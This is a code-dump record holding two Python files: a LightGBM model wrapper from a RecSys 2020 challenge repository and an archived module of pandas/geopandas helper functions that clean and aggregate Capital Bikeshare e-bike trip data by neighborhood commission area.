e2eafd10b9a42cf374bccc91017038c2fb7bae6a | 1,526 | py | Python | model_lgb_hakubishin_20200317/src/models/model_lightgbm.py | wantedly/recsys2020-challenge | d9967860cc4767380d28d2ed7af00d467cc6941a | [
"Apache-2.0"
] | 35 | 2020-06-23T05:33:50.000Z | 2021-11-22T08:22:42.000Z | model_lgb_hakubishin_20200317/src/models/model_lightgbm.py | wantedly/recsys2020-challenge | d9967860cc4767380d28d2ed7af00d467cc6941a | [
"Apache-2.0"
] | 15 | 2020-12-28T05:31:06.000Z | 2021-01-22T06:49:28.000Z | model_lgb_hakubishin_20200317/src/models/model_lightgbm.py | wantedly/recsys2020-challenge | d9967860cc4767380d28d2ed7af00d467cc6941a | [
"Apache-2.0"
] | 2 | 2020-06-30T10:02:05.000Z | 2021-05-22T09:57:19.000Z | import lightgbm as lgb
from .model import Base_Model
from src.utils import Pkl
class Model_LightGBM(Base_Model):
def train(self, x_trn, y_trn, x_val, y_val):
validation_flg = x_val is not None
# Setting datasets
d_trn = lgb.Dataset(x_trn, label=y_trn)
if validation_flg:
d_val = lgb.Dataset(x_val, label=y_val, reference=d_trn)
# Setting model parameters
lgb_model_params = self.params['model_params']
lgb_train_params = self.params['train_params']
# Training
if validation_flg:
self.model = lgb.train(
params=lgb_model_params,
train_set=d_trn,
valid_sets=[d_trn, d_val],
valid_names=['train', 'valid'],
**lgb_train_params
)
else:
self.model = lgb.train(
params=lgb_model_params,
train_set=d_trn,
**lgb_train_params
)
def predict(self, x):
return self.model.predict(x)
def get_feature_importance(self):
return self.model.feature_importance(importance_type='gain')
def get_best_iteration(self):
return self.model.best_iteration
def save_model(self):
model_path = self.model_output_dir / f'{self.run_fold_name}.pkl'
Pkl.dump(self.model, model_path)
def load_model(self):
model_path = self.model_output_dir / f'{self.run_fold_name}.pkl'
self.model = Pkl.load(model_path)
| 29.921569 | 72 | 0.60616 | 1,444 | 0.946265 | 0 | 0 | 0 | 0 | 0 | 0 | 156 | 0.102228 |
e2eba50e1eae9762f3a58281f7c829de6c02f619 | 4,031 | py | Python | cabi/archived/ebikes.py | jmillerbrooks/capital_bikeshare | 72023f9121068098e736f69605edff68bc2adff2 | [
"MIT"
] | null | null | null | cabi/archived/ebikes.py | jmillerbrooks/capital_bikeshare | 72023f9121068098e736f69605edff68bc2adff2 | [
"MIT"
] | null | null | null | cabi/archived/ebikes.py | jmillerbrooks/capital_bikeshare | 72023f9121068098e736f69605edff68bc2adff2 | [
"MIT"
] | null | null | null | ### DEPRECATE THESE? OLD VERSIONS OF CLEANING FUNCTIONS FOR JUST EBIKES
### NO LONGER WORKING WITH THESE
import pandas as pd
import numpy as np
from shapely.geometry import Point
import geopandas as gpd
from cabi.utils import which_anc, station_anc_dict
from cabi.get_data import anc_gdf
gdf = anc_gdf()
anc_dict = station_anc_dict()
station_keys = anc_dict.keys()
## NEEDS WORK!! FIX GET_DATA MODULE SO THAT LOAD CLEAN DOCKLESS CAN JUST CALL FROM THERE
def load_clean_dockless():
# FIX THIS CALL GET_DATA MODULE
df = pd.read_pickle('../data/wip/raw_dockless.pkl')
cleaned_ebikes = clean_frame(df)
cleaned_ebikes = cleaned_ebikes.drop('rideable_type', axis=1)
return cleaned_ebikes
def load_geo_ebikes():
df = load_clean_dockless()
geo_ebikes = to_geo(df)
return geo_ebikes
def load_clean_full():
"""DOCSTRING MAKE THIS EXTENSIBLE TO MORE MONTHS"""
df = pd.read_pickle('../data/wip/raw_apr_to_jul_df.pkl')
cleaned_full = clean_frame(df)
return cleaned_full
def geo_longer(df):
"""NEEDS DOCSTRING THIS FUNCTION MAKES ONE TIME COLUMN FROM START/END
AND DOUBLES THE LENGTH OF THE DF IN PROCESS, A GOOD TEST IS WHETHER OR NOT
THE LEN IS 2x OG DF"""
# List all the columns that are not start/end time for easy melt operation below
cols = list(df.columns)
cols.remove('started_at')
cols.remove('ended_at')
# Combine started_at/ended_at into one column 'time', indicating whether
# this was a trip start or trip end in another column, 'start_end',
# set index of new df to 'time'
# sort the index, so it makes sense as a time series
long_geo = df.rename(columns={'started_at': 'start', 'ended_at': 'end'}) \
.melt(id_vars=cols \
, value_vars=['start', 'end'] \
, var_name='start_end' \
, value_name='time') \
.set_index('time') \
.sort_index()
return long_geo
def load_long_geo():
"""DOCSTRING"""
df = load_geo_ebikes()
long_geo = geo_longer(df)
return long_geo
def load_long_geo_full():
"""DOCSTRING"""
df = load_geo_ebikes()
long_geo = geo_longer(df)
return long_geo
def anc_frame(df):
"""DOCSTRING"""
anc_df = df.drop(['start_station_name', 'end_station_name'], axis=1)
return anc_df
def load_long_anc():
"""DOCSTRING"""
df = load_long_geo()
anc_df = anc_frame(df)
return anc_df
# NEEDS WORK!! FIX DOCSTRING!! GENERALIZE TO ANY LOCATION COL (station etc.)
# This is likely uneccesary now that we have a more generalized long df function
def net_gain_loss_anc(ANC_name, df):
"""NEEDS DOCSTRING THIS FUNCTION RETURNS A SERIES (list? np.array?) OF 1 0 -1 VALUES
1 if RIDE ENDED IN ANC 0 IF RIDE DID NOT LEAVE OR END IN ANC -1 IF RIDE LEFT FROM ANC"""
conditions = [
(df['start_end'] == 'start') & (df['ANC_start'] == ANC_name),
(df['start_end'] == 'end') & (df['ANC_end'] == ANC_name),
(df['ANC_start'] != ANC_name) & (df['ANC_end'] != ANC_name),
(df['start_end'] == 'end') & (df['ANC_end'] != ANC_name),
(df['start_end'] == 'start') & (df['ANC_start'] != ANC_name)
]
values = [
-1,
1,
0,
0,
0
]
return np.select(conditions, values)
def plus_minus_anc_frame(df):
"""DOCSTRING GENERALIZE THIS FUNCTION TO ACCEPT OTHER THINGS BESIDE ANC REMOVE DEPENDENCY ON GDF"""
# Create dictionary of ancs (keys) and series of plus minus values returned from net_gain_loss_anc (values)
# for each unique ANC_ID
plus_minus_dict = {anc: net_gain_loss_anc(anc, df) \
for anc in \
list(gdf.ANC_ID)}
# Convert dict to dataframe, index by the (time) index of long_anc_df passed
anc_plus_minus_df = pd.DataFrame(plus_minus_dict, index=df.index)
return anc_plus_minus_df
def load_plus_minus_anc():
df = load_long_anc()
plus_minus = plus_minus_anc_frame(df)
return plus_minus
| 31.248062 | 111 | 0.65542 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,788 | 0.443562 |